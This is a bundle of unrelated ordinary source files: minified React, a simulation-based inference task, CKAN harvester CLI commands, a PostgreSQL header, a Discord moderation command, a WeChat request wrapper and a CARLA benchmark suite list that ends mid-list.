ta=0<a?Math.floor(1E3/a):5};var B=new MessageChannel,aa=B.port2;B.port1.onmessage=function(){if(null!==K){var a=q();ua=a+ta;try{K(!0,a)?aa.postMessage(null):(J=!1,K=null)}catch(b){throw aa.postMessage(null),b;}}else J=!1};z=function(a){K=a;J||(J=!0,aa.postMessage(null))};G=function(a,b){Z=Ma(function(){a(q())},b)};V=function(){Na(Z);Z=-1}}var p=[],u=[],Pa=1,l=null,m=3,H=!1,v=!1,y=!1,Qa=0;B={ReactCurrentDispatcher:na,ReactCurrentOwner:M,IsSomeRendererActing:{current:!1},assign:I};I(B,{Scheduler:{__proto__:null,
unstable_ImmediatePriority:1,unstable_UserBlockingPriority:2,unstable_NormalPriority:3,unstable_IdlePriority:5,unstable_LowPriority:4,unstable_runWithPriority:function(a,b){switch(a){case 1:case 2:case 3:case 4:case 5:break;default:a=3}var c=m;m=a;try{return b()}finally{m=c}},unstable_next:function(a){switch(m){case 1:case 2:case 3:var b=3;break;default:b=m}var c=m;m=b;try{return a()}finally{m=c}},unstable_scheduleCallback:function(a,b,c){var d=q();if("object"===typeof c&&null!==c){var e=c.delay;
e="number"===typeof e&&0<e?d+e:d;c="number"===typeof c.timeout?c.timeout:oa(a)}else c=oa(a),e=d;c=e+c;a={id:Pa++,callback:b,priorityLevel:a,startTime:e,expirationTime:c,sortIndex:-1};e>d?(a.sortIndex=e,S(u,a),null===n(p)&&a===n(u)&&(y?V():y=!0,G(T,e-d))):(a.sortIndex=c,S(p,a),v||H||(v=!0,z(U)));return a},unstable_cancelCallback:function(a){a.callback=null},unstable_wrapCallback:function(a){var b=m;return function(){var c=m;m=b;try{return a.apply(this,arguments)}finally{m=c}}},unstable_getCurrentPriorityLevel:function(){return m},
unstable_shouldYield:function(){var a=q();F(a);var b=n(p);return b!==l&&null!==l&&null!==b&&null!==b.callback&&b.startTime<=a&&b.expirationTime<l.expirationTime||W()},unstable_requestPaint:f,unstable_continueExecution:function(){v||H||(v=!0,z(U))},unstable_pauseExecution:function(){},unstable_getFirstCallbackNode:function(){return n(p)},get unstable_now(){return q},get unstable_forceFrameRate(){return X},unstable_Profiling:null},SchedulerTracing:{__proto__:null,__interactionsRef:null,__subscriberRef:null,
unstable_clear:function(a){return a()},unstable_getCurrent:function(){return null},unstable_getThreadID:function(){return++Qa},unstable_trace:function(a,b,c){return c()},unstable_wrap:function(a){return a},unstable_subscribe:function(a){},unstable_unsubscribe:function(a){}}});d.Children={map:function(a,b,c){if(null==a)return a;var d=[];R(a,d,null,b,c);return d},forEach:function(a,b,c){if(null==a)return a;b=ja(null,null,b,c);Q(a,ya,b);ka(b)},count:function(a){return Q(a,function(){return null},null)},
toArray:function(a){var b=[];R(a,b,null,function(a){return a});return b},only:function(a){if(!N(a))throw Error(r(143));return a}};d.Component=w;d.Fragment=Aa;d.Profiler=Ca;d.PureComponent=L;d.StrictMode=Ba;d.Suspense=Ga;d.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=B;d.cloneElement=function(a,b,c){if(null===a||void 0===a)throw Error(r(267,a));var d=I({},a.props),e=a.key,f=a.ref,m=a._owner;if(null!=b){void 0!==b.ref&&(f=b.ref,m=M.current);void 0!==b.key&&(e=""+b.key);if(a.type&&a.type.defaultProps)var h=
a.type.defaultProps;for(k in b)ha.call(b,k)&&!ia.hasOwnProperty(k)&&(d[k]=void 0===b[k]&&void 0!==h?h[k]:b[k])}var k=arguments.length-2;if(1===k)d.children=c;else if(1<k){h=Array(k);for(var l=0;l<k;l++)h[l]=arguments[l+2];d.children=h}return{$$typeof:x,type:a.type,key:e,ref:f,props:d,_owner:m}};d.createContext=function(a,b){void 0===b&&(b=null);a={$$typeof:Ea,_calculateChangedBits:b,_currentValue:a,_currentValue2:a,_threadCount:0,Provider:null,Consumer:null};a.Provider={$$typeof:Da,_context:a};return a.Consumer=
a};d.createElement=ea;d.createFactory=function(a){var b=ea.bind(null,a);b.type=a;return b};d.createRef=function(){return{current:null}};d.forwardRef=function(a){return{$$typeof:Fa,render:a}};d.isValidElement=N;d.lazy=function(a){return{$$typeof:Ia,_ctor:a,_status:-1,_result:null}};d.memo=function(a,b){return{$$typeof:Ha,type:a,compare:void 0===b?null:b}};d.useCallback=function(a,b){return t().useCallback(a,b)};d.useContext=function(a,b){return t().useContext(a,b)};d.useDebugValue=function(a,b){};
d.useEffect=function(a,b){return t().useEffect(a,b)};d.useImperativeHandle=function(a,b,c){return t().useImperativeHandle(a,b,c)};d.useLayoutEffect=function(a,b){return t().useLayoutEffect(a,b)};d.useMemo=function(a,b){return t().useMemo(a,b)};d.useReducer=function(a,b,c){return t().useReducer(a,b,c)};d.useRef=function(a){return t().useRef(a)};d.useState=function(a){return t().useState(a)};d.version="16.13.1"});
|
import logging
from pathlib import Path
from typing import Callable, Dict, List, Optional, Tuple
import numpy as np
import pyro
import torch
from pyro import distributions as pdist
from sbibm.tasks.simulator import Simulator
from sbibm.tasks.task import Task
class GaussianLinearUniform(Task):
    def __init__(
        self, dim: int = 10, prior_bound: float = 1.0, simulator_scale: float = 0.1
    ):
        """Gaussian Linear Uniform

        Inference of mean under uniform prior.

        Args:
            dim: Dimensionality of parameters and data.
            prior_bound: Prior is uniform in [-prior_bound, +prior_bound].
            simulator_scale: Standard deviation of noise in simulator.
        """
        super().__init__(
            dim_parameters=dim,
            dim_data=dim,
            name=Path(__file__).parent.name,
            name_display="Gaussian Linear Uniform",
            num_observations=10,
            num_posterior_samples=10000,
            num_reference_posterior_samples=10000,
            num_simulations=[100, 1000, 10000, 100000, 1000000],
            path=Path(__file__).parent.absolute(),
        )

        # Independent uniform prior over each of the dim_parameters dimensions.
        self.prior_params = {
            "low": -prior_bound * torch.ones((self.dim_parameters,)),
            "high": +prior_bound * torch.ones((self.dim_parameters,)),
        }
        self.prior_dist = pdist.Uniform(**self.prior_params).to_event(1)

        # NOTE(review): the precision matrix is inverse(simulator_scale * I),
        # i.e. simulator_scale is used as a variance-like scale here even
        # though the docstring calls it a standard deviation — confirm intent.
        self.simulator_params = {
            "precision_matrix": torch.inverse(
                simulator_scale * torch.eye(self.dim_parameters),
            )
        }

    def get_prior(self) -> Callable:
        # Returns a callable drawing `num_samples` parameter vectors from the prior.
        def prior(num_samples=1):
            return pyro.sample("parameters", self.prior_dist.expand_by([num_samples]))

        return prior

    def get_simulator(self, max_calls: Optional[int] = None) -> Simulator:
        """Get function returning samples from simulator given parameters

        Args:
            max_calls: Maximum number of function calls. Additional calls will
                result in SimulationBudgetExceeded exceptions. Defaults to None
                for infinite budget

        Return:
            Simulator callable
        """

        def simulator(parameters):
            # Data are Gaussian-distributed around the parameters
            # (linear-Gaussian observation model).
            return pyro.sample(
                "data",
                pdist.MultivariateNormal(
                    loc=parameters,
                    precision_matrix=self.simulator_params["precision_matrix"],
                ),
            )

        return Simulator(task=self, simulator=simulator, max_calls=max_calls)

    def _sample_reference_posterior(
        self,
        num_samples: int,
        num_observation: Optional[int] = None,
        observation: Optional[torch.Tensor] = None,
    ) -> torch.Tensor:
        """Sample reference posterior for given observation

        Uses closed form solution with rejection sampling

        Args:
            num_samples: Number of samples to generate
            num_observation: Observation number
            observation: Instead of passing an observation number, an observation may be
                passed directly

        Returns:
            Samples from reference posterior
        """
        # Exactly one of num_observation / observation must be supplied.
        assert not (num_observation is None and observation is None)
        assert not (num_observation is not None and observation is not None)

        if num_observation is not None:
            observation = self.get_observation(num_observation=num_observation)

        log = logging.getLogger(__name__)

        reference_posterior_samples = []

        # With a flat (uniform) prior, the posterior is the Gaussian
        # likelihood centred on the observation, truncated to the prior box.
        sampling_dist = pdist.MultivariateNormal(
            loc=observation, precision_matrix=self.simulator_params["precision_matrix"],
        )

        # Reject samples outside of prior bounds
        counter = 0
        while len(reference_posterior_samples) < num_samples:
            counter += 1
            sample = sampling_dist.sample()
            # log_prob is -inf outside the uniform support, so isinf detects
            # out-of-bounds samples.
            if not torch.isinf(self.prior_dist.log_prob(sample).sum()):
                reference_posterior_samples.append(sample)

        # assumes each accepted sample has a leading batch dim (e.g. (1, dim))
        # so cat stacks them into (num_samples, dim) — TODO confirm against
        # the observation shape.
        reference_posterior_samples = torch.cat(reference_posterior_samples)

        acceptance_rate = float(num_samples / counter)
        log.info(
            f"Acceptance rate for observation {num_observation}: {acceptance_rate}"
        )

        return reference_posterior_samples
if __name__ == "__main__":
    # Run task setup (observation/reference generation) when executed directly.
    task = GaussianLinearUniform()
    task._setup()
|
#!/usr/bin/env python3
"""Driver script: exercises the HP (Shannon entropy / affinities) step of t-SNE
for the first data point, printing the entropy and the affinity row."""
import numpy as np

# Sibling modules are loaded by filename: their names start with digits, so a
# regular `import` statement cannot reference them.
pca = __import__('1-pca').pca
P_init = __import__('2-P_init').P_init
HP = __import__('3-entropy').HP

# MNIST subset; reduce to 50 dimensions with PCA before computing distances.
X = np.loadtxt("mnist2500_X.txt")
X = pca(X, 50)
D, P, betas, _ = P_init(X, 30.0)
# Entropy and affinities of point 0 relative to all other points
# (D[0, 1:] skips the zero self-distance).
H0, P[0, 1:] = HP(D[0, 1:], betas[0])
print(H0)
print(P[0])
|
# -*- coding: utf8 -*-
from __future__ import division
from __future__ import absolute_import
from past.utils import old_div
import six
import ckan.plugins.toolkit as t
import ckan.lib.mailer as mailer
from datetime import datetime
import click
@click.group()
def apicatalog_admin():
    # The previous docstring was copy-pasted from the create-organization-users
    # subcommand; as the group docstring it becomes misleading --help output.
    '''Administration commands for apicatalog.'''
    pass
@apicatalog_admin.command(
    u'create-organization-users',
    help='Creates users based on records uploaded to create_user_to_organization endpoint'
)
@click.pass_context
@click.option(u'--retry', is_flag=True)
def create_organization_users(ctx, retry):
    # Run the action as the site user, since user creation is privileged.
    site_user = t.get_action('get_site_user')({'ignore_auth': True})
    flask_app = ctx.meta["flask_app"]

    # The action needs a request context (e.g. for rendering/mailing).
    with flask_app.test_request_context():
        result = t.get_action('create_organization_users')({'ignore_auth': True, 'user': site_user['name']},
                                                           {'retry': retry}).get('result', {})
        created = result.get('created', [])
        invalid = result.get('invalid', [])
        ambiguous = result.get('ambiguous', [])
        duplicate = result.get('duplicate', [])

        # Summarise the outcome per category for the operator.
        click.echo('Created users: %s' % ', '.join(created))
        click.echo('Duplicate users: %s' % ', '.join(duplicate))
        click.echo('Unknown business ids: %s' % ', '.join(invalid))
        click.echo('Ambiguous business ids: %s' % ', '.join(ambiguous))
@click.group()
def apicatalog_harvest():
    '''Harvester related commands.'''
    # Subcommands are attached below via @apicatalog_harvest.command(...).
    pass
@apicatalog_harvest.command(
    u'send-status-emails',
    help='Sends harvester status emails to configured recipients'
)
@click.pass_context
@click.option(u'--dryrun', is_flag=True)
@click.option(u'--force', is_flag=True)
@click.option(u'--all-harvesters', is_flag=True)
def send_harvester_status_emails(ctx, dryrun, force, all_harvesters):
    # Send a summary only when there is something to report (errors or runs
    # stuck for more than a day), unless --force is given.
    email_notification_recipients = t.aslist(t.config.get('ckanext.apicatalog.harvester_status_recipients', ''))

    if not email_notification_recipients and not dryrun:
        click.echo('No recipients configured')
        return

    status_opts = {} if not all_harvesters else {'include_manual': True, 'include_never_run': True}
    status = t.get_action('harvester_status')({}, status_opts)

    errored_runs = any(item.get('errors') != 0 for item in list(status.values()))
    running = (item.get('started') for item in list(status.values()) if item.get('status') == 'running')
    stuck_runs = any(_elapsed_since(started).days > 1 for started in running)

    if not (errored_runs or stuck_runs) and not force:
        click.echo('Nothing to report')
        return

    if len(status) == 0:
        click.echo('No harvesters matching criteria found')
        return

    site_title = t.config.get('ckan.site_title', '')
    today = datetime.now().date().isoformat()

    # Each entry is a two-stage %-template: the first substitution injects the
    # title column width (hence the escaped %%), the second fills the values.
    status_templates = {
        'running': '%%(title)-%ds | Running since %%(time)s with %%(errors)d errors',
        'finished': '%%(title)-%ds | Finished %%(time)s with %%(errors)d errors',
        'pending': '%%(title)-%ds | Pending since %%(time)s'}
    unknown_status_template = '%%(title)-%ds | Unknown status: %%(status)s'
    max_title_length = max(len(title) for title in status)

    def status_string(title, values):
        # Format one harvester's line; unknown statuses fall back to a
        # generic template.
        template = status_templates.get(values.get('status'), unknown_status_template)
        status = values.get('status')
        time_field = 'finished' if status == 'finished' else 'started'
        # First % fixes the column width, second % fills in the values.
        return template % max_title_length % {
            'title': title,
            'time': _pretty_time(values.get(time_field)),
            'status': status,
            'errors': values.get('errors')
        }

    msg = '%(site_title)s - Harvester summary %(today)s\n\n%(status)s' % {
        'site_title': site_title,
        'today': today,
        'status': '\n'.join(status_string(title, values) for title, values in list(status.items()))
    }

    subject = '%s - Harvester summary %s' % (site_title, today)
    _send_harvester_notification(subject, msg, email_notification_recipients, dryrun)

    if dryrun:
        click.echo(msg)
@apicatalog_harvest.command(
    u'send-stuck-runs-report',
    help='Sends stuck runs report to configured recipients'
)
@click.option(u'--dryrun', is_flag=True)
@click.option(u'--force', is_flag=True)
@click.option(u'--all-harvesters', is_flag=True)
@click.pass_context
def send_stuck_runs_report(ctx, dryrun, force, all_harvesters):
    # Report harvest jobs that have been in the 'running' state for more than
    # 24 hours to the configured fault recipients.
    email_notification_recipients = t.aslist(t.config.get('ckanext.apicatalog.fault_recipients', ''))

    if not email_notification_recipients and not dryrun:
        click.echo('No recipients configured')
        return

    status_opts = {} if not all_harvesters else {'include_manual': True, 'include_never_run': True}
    status = t.get_action('harvester_status')({}, status_opts)

    stuck_runs = [(title, job_status) for title, job_status in six.iteritems(status)
                  if job_status.get('status') == 'running' and _elapsed_since(job_status.get('started')).days > 1]

    if stuck_runs:
        site_title = t.config.get('ckan.site_title', '')
        # NOTE: the loop variable `status` below shadows the outer `status`
        # dict; it refers to each stuck job's status record.
        msg = '%(site_title)s - Following harvesters have been running more than 24 hours: \n\n%(status)s\n\n' \
              'Instructions to fix this can be found from here %(instructions)s' % \
              {
                  'site_title': site_title,
                  'status': '\n'.join('%s has been stuck since %s' %
                                      (title, status.get('started')) for title, status in stuck_runs),
                  'instructions': t.config.get('ckanext.apicatalog.harvester_instruction_url', 'url not configured')
              }

        subject = '%s - There are stuck harvester runs that need to have a look at' % site_title
        _send_harvester_notification(subject, msg, email_notification_recipients, dryrun)

        if dryrun:
            click.echo(msg)
    else:
        click.echo('Nothing to report')
def _send_harvester_notification(subject, msg, recipients, dryrun):
    """Send *msg* with *subject* to each recipient; on a dry run only echo
    the would-be recipient addresses instead of sending mail."""
    for address in recipients:
        if dryrun:
            click.echo('to: %s' % address)
            continue
        try:
            mailer.mail_recipient(recipient_name=address,
                                  recipient_email=address,
                                  subject=subject,
                                  body=msg)
        except mailer.MailerException as e:
            # A failure for one recipient should not stop the others.
            click.echo('Sending harvester notification to %s failed: %s' % (address, e))
def _elapsed_since(t):
if t is None:
return t
if isinstance(t, str):
t = datetime.strptime(t, '%Y-%m-%d %H:%M:%S.%f')
return datetime.now() - t
def _pretty_time(t):
    """Humanize timestamp *t* ('today', 'yesterday', 'N days/months/years
    ago'); returns 'unknown' for None."""
    if t is None:
        return 'unknown'
    days = _elapsed_since(t).days
    if days == 0:
        return 'today'
    if days == 1:
        return 'yesterday'
    if days < 30:
        return '%d days ago' % days
    if days < 365:
        return '%d months ago' % int(old_div(days, 30))
    return '%d years ago' % int(old_div(days, 365))
@click.group()
def apicatalog_database():
    '''Database commands for apicatalog.'''
    # Subcommands (e.g. init) are registered below.
@apicatalog_database.command()
@click.pass_context
def init(ctx):
    'Initializes database for apicatalog'
    # Imports are deferred so this module can be loaded without a fully
    # configured CKAN environment.
    import ckan.model as model
    from .db import init_table
    init_table(model.meta.engine)
def get_commands():
    # CKAN plugin entry point: the click groups this extension contributes.
    return [apicatalog_admin, apicatalog_harvest, apicatalog_database]
|
import google from '../data/google';
import yandex from '../data/yandex';
/**
 * Resolve a language name or code to the engine-specific language code.
 * @param {string} name - Language name or code (case-insensitive).
 * @param {string} engine - Translation engine id: 'google' or 'yandex' (anything else falls back to google).
 * @returns {string} The language code used by the selected engine.
 * @throws {Error} If `name` is not a string, exceeds 100 chars, or is unknown to the engine.
 */
export default (name, engine) => {
  // Keep the engine *name* for error messages. The original reassigned the
  // `engine` parameter to the data table, so the error interpolated
  // "[object Object]" instead of the engine name.
  let engineName = engine;
  let table;
  switch (engine) {
    case 'google': table = google; break;
    case 'yandex': table = yandex; break;
    default: engineName = 'google'; table = google;
  }

  // Validate the name string
  if (typeof name !== 'string') {
    throw new Error(`The language must be a string, received ${typeof name}`);
  }

  // Possible overflow errors
  if (name.length > 100) {
    throw new Error(`The language must be a string under 100 characters, received ${name.length}`);
  }

  // Let's work with lowercase for everything
  name = name.toLowerCase();

  return map(name, table);

  function map(name, table) {
    // A match is either the entry key (language name) or value (language code).
    const entry = Object.entries(table).find(([key, value]) => key === name || value === name);
    if (!name || !entry) {
      // Also fixes the "suppored" typo from the original message.
      throw new Error(`The name "${name}" is not supported by the ${engineName} translation API.`);
    }
    return entry[1];
  }
};
|
/*
* dfu-programmer
*
* $Id: atmel.c 25 2006-06-25 00:01:37Z schmidtw $
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
*/
#include <stdarg.h>
#include <stdio.h>
#include "util.h"
extern int debug;

/*
 * Print a debug message to stderr, prefixed with "file:line: ", but only
 * when the requested level is below the global debug threshold.
 * (The va_list variable is named `args` rather than `va_arg` so it does
 * not shadow the standard <stdarg.h> macro of that name.)
 */
void dfu_debug( const char *file, const char *function, const int line,
                const int level, const char *format, ... )
{
    va_list args;

    if( level >= debug )
        return;

    va_start( args, format );
    fprintf( stderr, "%s:%d: ", file, line );
    vfprintf( stderr, format, args );
    va_end( args );
}
|
/*-------------------------------------------------------------------------
*
* relcache.h
* Relation descriptor cache definitions.
*
*
* Portions Copyright (c) 1996-2018, PostgreSQL Global Development Group
* Portions Copyright (c) 1994, Regents of the University of California
*
* src/include/utils/relcache.h
*
*-------------------------------------------------------------------------
*/
#ifndef RELCACHE_H
#define RELCACHE_H
#include "access/tupdesc.h"
#include "nodes/bitmapset.h"
/*
* Name of relcache init file(s), used to speed up backend startup
*/
#define RELCACHE_INIT_FILENAME "pg_internal.init"
typedef struct RelationData *Relation;
/* ----------------
* RelationPtr is used in the executor to support index scans
* where we have to keep track of several index relations in an
* array. -cim 9/10/89
* ----------------
*/
typedef Relation *RelationPtr;
/*
* Routines to open (lookup) and close a relcache entry
*/
extern Relation RelationIdGetRelation(Oid relationId);
extern void RelationClose(Relation relation);
/*
* Routines to compute/retrieve additional cached information
*/
extern List *RelationGetFKeyList(Relation relation);
extern List *RelationGetIndexList(Relation relation);
extern List *RelationGetStatExtList(Relation relation);
extern Oid RelationGetOidIndex(Relation relation);
extern Oid RelationGetPrimaryKeyIndex(Relation relation);
extern Oid RelationGetReplicaIndex(Relation relation);
extern List *RelationGetIndexExpressions(Relation relation);
extern List *RelationGetIndexPredicate(Relation relation);
/*
 * Selector for RelationGetIndexAttrBitmap(): which set of indexed
 * attribute numbers the caller wants.  The exact semantics of each
 * member are defined by the implementation in relcache.c — consult
 * RelationGetIndexAttrBitmap there before relying on them.
 */
typedef enum IndexAttrBitmapKind
{
	INDEX_ATTR_BITMAP_HOT,
	INDEX_ATTR_BITMAP_PROJ,
	INDEX_ATTR_BITMAP_KEY,
	INDEX_ATTR_BITMAP_PRIMARY_KEY,
	INDEX_ATTR_BITMAP_IDENTITY_KEY
} IndexAttrBitmapKind;
extern Bitmapset *RelationGetIndexAttrBitmap(Relation relation,
IndexAttrBitmapKind keyAttrs);
extern void RelationGetExclusionInfo(Relation indexRelation,
Oid **operators,
Oid **procs,
uint16 **strategies);
extern void RelationSetIndexList(Relation relation,
List *indexIds, Oid oidIndex);
extern void RelationInitIndexAccessInfo(Relation relation);
/* caller must include pg_publication.h */
struct PublicationActions;
extern struct PublicationActions *GetRelationPublicationActions(Relation relation);
/*
* Routines to support ereport() reports of relation-related errors
*/
extern int errtable(Relation rel);
extern int errtablecol(Relation rel, int attnum);
extern int errtablecolname(Relation rel, const char *colname);
extern int errtableconstraint(Relation rel, const char *conname);
/*
* Routines for backend startup
*/
extern void RelationCacheInitialize(void);
extern void RelationCacheInitializePhase2(void);
extern void RelationCacheInitializePhase3(void);
extern void K2PgPreloadRelCache();
/*
* Routine to create a relcache entry for an about-to-be-created relation
*/
extern Relation RelationBuildLocalRelation(const char *relname,
Oid relnamespace,
TupleDesc tupDesc,
Oid relid,
Oid relfilenode,
Oid reltablespace,
bool shared_relation,
bool mapped_relation,
char relpersistence,
char relkind);
/*
* Routine to manage assignment of new relfilenode to a relation
*/
extern void RelationSetNewRelfilenode(Relation relation, char persistence,
TransactionId freezeXid, MultiXactId minmulti);
/*
* Routines for flushing/rebuilding relcache entries in various scenarios
*/
extern void RelationForgetRelation(Oid rid);
extern void RelationCacheInvalidateEntry(Oid relationId);
extern void RelationCacheInvalidate(void);
extern void RelationCloseSmgrByOid(Oid relationId);
extern void AtEOXact_RelationCache(bool isCommit);
extern void AtEOSubXact_RelationCache(bool isCommit, SubTransactionId mySubid,
SubTransactionId parentSubid);
/*
* Routines to help manage rebuilding of relcache init files
*/
extern bool RelationIdIsInInitFile(Oid relationId);
extern void RelationCacheInitFilePreInvalidate(void);
extern void RelationCacheInitFilePostInvalidate(void);
extern void RelationCacheInitFileRemove(void);
/* should be used only by relcache.c and catcache.c */
extern bool criticalRelcachesBuilt;
/* should be used only by relcache.c and postinit.c */
extern bool criticalSharedRelcachesBuilt;
#endif /* RELCACHE_H */
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2018 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Helper proxy to the state object."""
from __future__ import absolute_import, print_function
from flask import current_app
from werkzeug.local import LocalProxy
# Lazily resolves to the 'invenio-app-ils' extension instance registered on
# the current Flask application; raises if used outside an app context.
current_app_ils = LocalProxy(
    lambda: current_app.extensions['invenio-app-ils']
)
"""Helper proxy to get the current App ILS extension."""
|
const db = require("quick.db");
const Discord = require("discord.js")
module.exports = {
name: "role-all",
aliases: ["ra", "all-role"],
execute: async(client, message, args) => {
if (message.member.hasPermission("MANAGE_SERVER")) {
var role1 = message.mentions.roles.first().id;
if(!role1)
{
var role1 = args[0];
}
let role2 = message.guild.roles.cache.get(`${role1}`);
message.guild.members.cache.forEach(member => member.roles.add(role2))
message.reply("Done It will be running in background")
}
}
}
// Help metadata; name/usage aligned with the command's actual name
// ("role-all") and the description typo ("Gves") fixed.
module.exports.help = {
  name: "role-all",
  description: "It gives your given role to all members of the server",
  usage: "role-all",
  type: "Moderation"
}
const helperIseDeclarations = {};
helperIseDeclarations["ka"] = require("./array_helpers/ka.js");
helperIseDeclarations["siLetaNla"] = require("./string_helpers/si_leta_nla.js");
helperIseDeclarations["siLetaKekere"] = require("./string_helpers/si_leta_kekere.js");
helperIseDeclarations["waNinu"] = require("./string_helpers/wa_ni_nu.js");
helperIseDeclarations["fiRopo"] = require("./string_helpers/fi_ro_po.js");
helperIseDeclarations["teSibi"] = require("./input_output/tesibi.js");
helperIseDeclarations["aago"] = require("./datetime_helpers/aago.js");
helperIseDeclarations["yipo"] = require("./random_helpers/yipo.js");
module.exports = helperIseDeclarations;
|
import config from './config';
import md5 from './md5';
export default class Http {
  /**
   * Perform a signed request against the API, showing a WeChat loading
   * indicator for the duration of the call.
   * @param {{url: string, data?: object, method?: string}} options
   * @returns {Promise<*>} resolves with the response body, rejects on network failure
   */
  axios({ url, data = {}, method = 'GET' }) {
    wx.showLoading({
      title: 'Loading...',
      mask: true,
    });
    const { sign, timestamp } = this.getSign();
    return new Promise((resolve, reject) => {
      wx.request({
        url: config.domain + url,
        data,
        method,
        header: {
          'username': config.username,
          'password': config.password,
          sign,
          timestamp
        },
        success: res => resolve(res.data),
        fail: err => reject(err),
        complete: () => {
          wx.hideLoading();
        }
      });
    });
  }

  /**
   * Upload a single file with the same signed headers as axios().
   * @param {{url: string, filePath: string, name?: string}} options
   * @returns {Promise<*>} resolves with the response body
   */
  upLoadFile({ url, filePath, name = "file" }) {
    const { sign, timestamp } = this.getSign();
    return new Promise((resolve, reject) => {
      wx.uploadFile({
        url: config.domain + url,
        header: {
          username: config.username,
          password: config.password,
          sign,
          timestamp
        },
        filePath,
        name,
        success: res => resolve(res.data),
        // Bug fix: the original never called reject, so a failed upload
        // left the returned promise pending forever.
        fail: err => reject(err)
      });
    });
  }

  /**
   * Build the md5 request signature from the configured credentials.
   * @returns {{sign: string, timestamp: number}}
   */
  getSign() {
    const timestamp = Date.now();
    const sign = md5(config.username + config.token + config.password + timestamp);
    return { sign, timestamp };
  }
}
VERSION = '099'
WEATHER_1 = [1, 3, 6, 8] # train
WEATHER_2 = [4, 14] # test
WEATHER_3 = [10, 14]
WEATHER_4 = [1, 8, 14] # validate
ALL_SUITES = dict()
def _add(suite_name, *args, **kwargs):
assert suite_name not in ALL_SUITES, '%s is already registered!' % suite_name
town = None
if 'Town01' in suite_name:
town = 'Town01'
elif 'Town02' in suite_name:
town = 'Town02'
elif 'Town04' in suite_name:
town = 'Town04'
else:
raise Exception('No town specified: %s.' % suite_name)
benchmark = 'carla100' if 'NoCrash' in suite_name else 'corl2017'
suite = None
if 'Turn' in suite_name:
suite = 'turn'
elif 'Straight' in suite_name:
suite = 'straight'
elif 'ChangeLane' in suite_name:
suite = 'changelane'
elif 'Full' in suite_name:
suite = 'full'
elif 'NoCrash' in suite_name:
suite = 'nocrash'
else:
raise Exception('No suite specified: %s.' % suite_name)
kwargs['town'] = town
kwargs['poses_txt'] = '%s/%s/%s_%s.txt' % (benchmark, VERSION, suite, town)
kwargs['col_is_failure'] = 'NoCrash' in suite_name
ALL_SUITES[suite_name] = (args, kwargs)
# ============= Register Suites ============= #
# _add('DebugTown01-v0', DebugSuite, n_vehicles=10, viz_camera=True)
# _add('FullTown01-v0', n_vehicles=0, viz_camera=True)
# _add('FullTown02-v0', n_vehicles=0, viz_camera=True)
# data collection town; no respawn to prevent missing frames
_add('FullTown01-v0', n_vehicles=0, weathers=WEATHER_1, respawn_peds=False)
# Train town, train weathers.
_add('FullTown01-v1', n_vehicles=0, weathers=WEATHER_1)
_add('StraightTown01-v1', n_vehicles=0, weathers=WEATHER_1)
_add('TurnTown01-v1', n_vehicles=0, weathers=WEATHER_1)
_add('FullTown04-v1', n_vehicles=0, weathers=WEATHER_1)
_add('StraightTown04-v1', n_vehicles=0, weathers=WEATHER_1)
_add('ChangeLaneTown04-v1', n_vehicles=0, weathers=WEATHER_1)
# Train town, test weathers.
_add('FullTown01-v2', n_vehicles=0, weathers=WEATHER_2)
_add('StraightTown01-v2', n_vehicles=0, weathers=WEATHER_2)
_add('TurnTown01-v2', n_vehicles=0, weathers=WEATHER_2)
_add('FullTown04-v2', n_vehicles=0, weathers=WEATHER_2)
_add('StraightTown04-v2', n_vehicles=0, weathers=WEATHER_2)
_add('ChangeLaneTown04-v2', n_vehicles=0, weathers=WEATHER_2)
# Train town, more vehicles
_add('FullTown01-v3', n_vehicles=20, n_pedestrians=50, weathers=WEATHER_1)
_add('FullTown01-v4', n_vehicles=20, n_pedestrians=50, weathers=WEATHER_2)
_add('FullTown04-v3', n_vehicles=20, n_pedestrians=50, weathers=WEATHER_1)
_add('FullTown04-v4', n_vehicles=20, n_pedestrians=50, weathers=WEATHER_2)
# No ped versions
_add('FullTown01-v3-np', n_vehicles=20, n_pedestrians=0, weathers=WEATHER_1)
_add('FullTown01-v4-np', n_vehicles=20, n_pedestrians=0, weathers=WEATHER_2)
_add('FullTown04-v3-np', n_vehicles=20, n_pedestrians=0, weathers=WEATHER_1)
_add('FullTown04-v4-np', n_vehicles=20, n_pedestrians=0, weathers=WEATHER_2)
# Test town, train weathers.
_add('FullTown02-v1', n_vehicles=0, weathers=WEATHER_1)
_add('StraightTown02-v1', n_vehicles=0, weathers=WEATHER_1)
_add('TurnTown02-v1', n_vehicles=0, weathers=WEATHER_1)
# Test town, test weathers.
_add('FullTown02-v2', n_vehicles=0, weathers=WEATHER_2)
_add('StraightTown02-v2', n_vehicles=0, weathers=WEATHER_2)
_add('TurnTown02-v2', n_vehicles=0, weathers=WEATHER_2)
# Test town, more vehicles.
_add('FullTown02-v3', n_vehicles=15, n_pedestrians=50, weathers=WEATHER_1)
_add('FullTown02-v4', n_vehicles=15, n_pedestrians=50, weathers=WEATHER_2)
# No ped versions
_add('FullTown02-v3-np', n_vehicles=15, n_pedestrians=0, weathers=WEATHER_1)
_add('FullTown02-v4-np', n_vehicles=15, n_pedestrians=0, weathers=WEATHER_2)
_add('NoCrashTown01-v1', n_vehicles=0, disable_two_wheels=True, weathers=WEATHER_1)
_add('NoCrashTown01-v2', n_vehicles=0, disable_two_wheels=True, weathers=WEATHER_3)
_add('NoCrashTown01-v3', n_vehicles=20, disable_two_wheels=True, n_pedestrians=50, weathers=WEATHER_1)
_add('NoCrashTown01-v4', n_vehicles=20, disable_two_wheels=True, n_pedestrians=50, weathers=WEATHER_3)
_add('NoCrashTown01-v5', n_vehicles=100, disable_two_wheels=True, n_pedestrians=250, weathers=WEATHER_1)
_add('NoCrashTown01-v6', n_vehicles=100, disable_two_wheels=True, n_pedestrians=250, weathers=WEATHER_3)
# No ped versions
